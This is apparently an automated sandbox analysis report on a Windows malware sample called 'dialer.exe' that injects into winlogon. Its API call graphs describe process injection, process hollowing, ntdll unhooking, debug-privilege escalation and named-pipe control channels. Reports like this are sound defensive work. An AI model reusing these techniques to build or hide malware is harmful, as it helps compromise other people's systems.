                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: Locator'$riptor at (
                                                  • API String ID: 592178966-4215709766
                                                  • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction ID: 51b56e7d7da7883d564ff1d8aa55c5c33bcb232568c085f55078eb698fd1127b
                                                  • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction Fuzzy Hash: 3CE08C71A20B88C4EF028F21E8802DCB3A1EB68B64FC89133CE4C06311EE38D1E9C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction ID: e1d6aeabad6ccef3ff38877d506157880c324e0593935b115836214f7ad20565
                                                  • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction Fuzzy Hash: BE116035725BC4C5EA15DB66E8043ADB7A1FB89FC1F18403ADE4D53765DE39C8428300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction ID: caadc08de9d2bac00fe2f05b454c5bd5b931daf7e9d403db42940cda31ad44e3
                                                  • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction Fuzzy Hash: CEE03975721684C6EB058BA2D80838ABFE1EB89B06F0480288D0907351DF7EC499C750

                                                  Execution Graph

                                                  Execution Coverage:48.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:227
                                                  Total number of Limit Nodes:23
                                                  execution_graph 384 140002bf8 385 140002c05 384->385 387 140002c25 ConnectNamedPipe 385->387 388 140002c1a Sleep 385->388 395 140001b54 AllocateAndInitializeSid 385->395 389 140002c83 Sleep 387->389 390 140002c34 ReadFile 387->390 388->385 392 140002c8e DisconnectNamedPipe 389->392 391 140002c57 390->391 390->392 402 140002524 391->402 392->387 396 140001bb1 SetEntriesInAclW 395->396 397 140001c6f 395->397 396->397 398 140001bf5 LocalAlloc 396->398 397->385 398->397 399 140001c09 InitializeSecurityDescriptor 398->399 399->397 400 140001c19 SetSecurityDescriptorDacl 399->400 400->397 401 140001c30 CreateNamedPipeW 400->401 401->397 403 140002531 402->403 404 140002539 WriteFile 402->404 406 1400010c0 403->406 404->392 444 1400018ac OpenProcess 406->444 409 1400014ba 409->404 410 140001122 OpenProcess 410->409 411 14000113e OpenProcess 410->411 412 140001161 K32GetModuleFileNameExW 411->412 413 1400011fd NtQueryInformationProcess 411->413 414 1400011aa CloseHandle 412->414 415 14000117a PathFindFileNameW lstrlenW 412->415 416 1400014b1 CloseHandle 413->416 417 140001224 413->417 414->413 419 1400011b8 414->419 415->414 418 140001197 StrCpyW 415->418 416->409 417->416 420 140001230 OpenProcessToken 417->420 418->414 419->413 421 1400011d8 StrCmpIW 419->421 420->416 422 14000124e GetTokenInformation 420->422 421->416 421->419 423 1400012f1 422->423 424 140001276 GetLastError 422->424 425 1400012f8 CloseHandle 423->425 424->423 426 140001281 LocalAlloc 424->426 425->416 431 14000130c 425->431 426->423 427 140001297 GetTokenInformation 426->427 428 1400012df 427->428 429 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 427->429 430 1400012e6 LocalFree 428->430 429->430 430->425 431->416 432 14000139b StrStrA 431->432 433 1400013c3 431->433 432->431 434 1400013c8 432->434 433->416 434->416 435 1400013f3 VirtualAllocEx 434->435 435->416 436 140001420 WriteProcessMemory 435->436 436->416 437 14000143b 436->437 449 14000211c 437->449 439 14000145b 439->416 440 140001478 WaitForSingleObject 439->440 443 140001471 CloseHandle 439->443 442 140001487 GetExitCodeThread 440->442 440->443 442->443 443->416 445 14000110e 444->445 446 1400018d8 IsWow64Process 444->446 445->409 445->410 447 1400018f8 CloseHandle 446->447 448 1400018ea 446->448 447->445 448->447 452 140001914 GetModuleHandleA 449->452 453 140001934 GetProcAddress 452->453 454 14000193d 452->454 453->454 455 140002258 458 14000226c 455->458 482 140001f2c 458->482 461 140001f2c 14 API calls 462 14000228f GetCurrentProcessId OpenProcess 461->462 463 140002321 FindResourceExA 462->463 464 1400022af OpenProcessToken 462->464 467 140002341 SizeofResource 463->467 468 140002261 ExitProcess 463->468 465 1400022c3 LookupPrivilegeValueW 464->465 466 140002318 CloseHandle 464->466 465->466 469 1400022da AdjustTokenPrivileges 465->469 466->463 467->468 470 14000235a LoadResource 467->470 469->466 471 140002312 GetLastError 469->471 470->468 472 14000236e LockResource GetCurrentProcessId 470->472 471->466 496 1400017ec GetProcessHeap HeapAlloc 472->496 474 14000238b RegCreateKeyExW 475 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 474->475 476 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 474->476 477 14000250f SleepEx 475->477 478 1400023f4 RegSetKeySecurity LocalFree 476->478 479 14000240e RegCreateKeyExW 476->479 477->477 478->479 480 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 479->480 481 14000247f RegCloseKey 479->481 480->481 481->475 483 140001f35 StrCpyW StrCatW GetModuleHandleW 482->483 484 1400020ff 482->484 483->484 485 140001f86 GetCurrentProcess K32GetModuleInformation 483->485 484->461 486 1400020f6 FreeLibrary 485->486 487 140001fb6 CreateFileW 485->487 486->484 487->486 488 140001feb CreateFileMappingW 487->488 489 140002014 MapViewOfFile 488->489 490 1400020ed CloseHandle 488->490 491 1400020e4 CloseHandle 489->491 492 140002037 489->492 490->486 491->490 492->491 493 140002050 lstrcmpiA 492->493 495 14000208e 492->495 493->492 494 140002090 VirtualProtect VirtualProtect 493->494 494->491 495->491 502 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 496->502 498 140001885 GetProcessHeap HeapFree 499 140001830 499->498 500 140001851 OpenProcess 499->500 500->499 501 140001867 TerminateProcess CloseHandle 500->501 501->499 503 140001565 502->503 504 14000162f GetProcessHeap HeapFree GetProcessHeap HeapFree 502->504 503->504 505 14000157a OpenProcess 503->505 507 14000161a CloseHandle 503->507 508 1400015c9 ReadProcessMemory 503->508 504->499 505->503 506 140001597 K32EnumProcessModules 505->506 506->503 506->507 507->503 508->503 509 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 510 140002b8e K32EnumProcesses 509->510 511 140002beb Sleep 510->511 513 140002ba3 510->513 511->510 512 140002bdc 512->511 513->512 515 140002540 513->515 516 140002558 515->516 517 14000254d 515->517 516->513 518 1400010c0 30 API calls 517->518 518->516 519 1400021d0 520 1400021dd 519->520 521 140001b54 6 API calls 520->521 522 1400021f2 Sleep 520->522 523 1400021fd ConnectNamedPipe 520->523 521->520 522->520 524 140002241 Sleep 523->524 525 14000220c ReadFile 523->525 526 14000224c DisconnectNamedPipe 524->526 525->526 527 14000222f 525->527 526->523 527->526 528 140002560 529 140002592 528->529 530 14000273a 528->530 531 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 529->531 532 140002598 529->532 533 140002748 530->533 534 14000297e ReadFile 530->534 535 140002633 531->535 537 140002704 531->537 538 1400025a5 532->538 539 1400026bd ExitProcess 532->539 540 140002751 533->540 541 140002974 533->541 534->535 536 1400029a8 534->536 536->535 549 1400018ac 3 API calls 536->549 537->535 551 1400010c0 30 API calls 537->551 545 1400025ae 538->545 546 140002660 RegOpenKeyExW 538->546 542 140002919 540->542 543 14000275c 540->543 544 14000175c 22 API calls 541->544 550 140001944 ReadFile 542->550 547 140002761 543->547 548 14000279d 543->548 544->535 545->535 561 1400025cb ReadFile 545->561 552 1400026a1 546->552 553 14000268d RegDeleteValueW 546->553 547->535 610 14000217c 547->610 613 140001944 548->613 554 1400029c7 549->554 556 140002928 550->556 551->537 597 1400019c4 SysAllocString SysAllocString CoInitializeEx 552->597 553->552 554->535 565 1400029db GetProcessHeap HeapAlloc 554->565 566 140002638 554->566 556->535 568 140001944 ReadFile 556->568 560 1400026a6 605 14000175c GetProcessHeap HeapAlloc 560->605 561->535 563 1400025f5 561->563 563->535 575 1400018ac 3 API calls 563->575 571 1400014d8 13 API calls 565->571 577 140002a90 4 API calls 566->577 567 1400027b4 ReadFile 567->535 572 1400027dc 567->572 573 14000293f 568->573 588 140002a14 571->588 572->535 578 1400027e9 GetProcessHeap HeapAlloc ReadFile 572->578 573->535 579 140002947 ShellExecuteW 573->579 581 140002614 575->581 577->535 583 14000290b GetProcessHeap 578->583 584 14000282d 578->584 579->535 581->535 581->566 587 140002624 581->587 582 140002a49 GetProcessHeap 585 140002a52 HeapFree 582->585 583->585 584->583 589 140002881 lstrlenW GetProcessHeap HeapAlloc 584->589 590 14000285e 584->590 585->535 591 1400010c0 30 API calls 587->591 588->582 637 1400016cc 588->637 631 140002a90 CreateFileW 589->631 590->583 617 140001c88 590->617 591->535 598 140001a11 CoInitializeSecurity 597->598 599 140001b2c SysFreeString SysFreeString 597->599 600 140001a59 CoCreateInstance 598->600 601 140001a4d 598->601 599->560 602 140001b26 CoUninitialize 600->602 603 140001a88 VariantInit 600->603 601->600 601->602 602->599 604 140001ade 603->604 604->602 606 1400014d8 13 API calls 605->606 608 14000179a 606->608 607 1400017c8 GetProcessHeap HeapFree 608->607 609 1400016cc 5 API calls 608->609 609->608 611 140001914 2 API calls 610->611 612 140002191 611->612 614 140001968 ReadFile 613->614 615 14000198b 614->615 616 1400019a5 614->616 615->614 615->616 616->535 616->567 618 140001cbb 617->618 619 140001cce CreateProcessW 618->619 621 140001e97 618->621 623 140001e62 OpenProcess 618->623 625 140001dd2 VirtualAlloc 618->625 627 140001d8c WriteProcessMemory 618->627 619->618 620 140001d2b VirtualAllocEx 619->620 620->618 622 140001d60 WriteProcessMemory 620->622 621->583 622->618 623->618 624 140001e78 TerminateProcess 623->624 624->618 625->618 626 140001df1 GetThreadContext 625->626 626->618 628 140001e09 WriteProcessMemory 626->628 627->618 628->618 629 140001e30 SetThreadContext 628->629 629->618 630 140001e4e ResumeThread 629->630 630->618 630->621 632 1400028f7 GetProcessHeap HeapFree 631->632 633 140002ada WriteFile 631->633 632->583 634 140002b1c CloseHandle 633->634 635 140002afe 633->635 634->632 635->634 636 140002b02 WriteFile 635->636 636->634 638 140001745 637->638 639 1400016eb OpenProcess 637->639 638->582 639->638 640 140001703 639->640 641 14000211c 2 API calls 640->641 642 140001723 641->642 643 14000173c CloseHandle 642->643 644 140001731 CloseHandle 642->644 643->638 644->643

                                                  Callgraph

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                  • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                  • API String ID: 4177739653-1130149537
                                                  • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                  • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                  • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                  • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                  • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                  • API String ID: 2561231171-3753927220
                                                  • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                  • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                  • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                  • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                  • String ID:
                                                  • API String ID: 4084875642-0
                                                  • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                  • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                  • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                  • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                  • String ID: .text$C:\Windows\System32\
                                                  • API String ID: 2721474350-832442975
                                                  • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                  • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                  • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                  • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                  • String ID: M$\\.\pipe\dialerchildproc64
                                                  • API String ID: 2203880229-3489460547
                                                  • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                  • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                  • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                  • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                  • String ID: \\.\pipe\dialercontrol_redirect64
                                                  • API String ID: 2071455217-3440882674
                                                  • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                  • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                  • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                  • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                  • String ID:
                                                  • API String ID: 3197395349-0
                                                  • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                  • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                  • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                  • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 Sleep 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                  • String ID:
                                                  • API String ID: 3676546796-0
                                                  • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                  • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                  • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                  • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                  Control-flow Graph

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                  • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                    • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                    • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                    • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                    • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                    • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                    • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                    • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                    • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                                                    • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                    • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                                                  • OpenProcess.KERNEL32 ref: 0000000140001859
                                                  • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                  • CloseHandle.KERNEL32 ref: 0000000140001875
                                                  • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                  • String ID:
                                                  • API String ID: 1323846700-0
                                                  • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                  • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                  • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                  • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
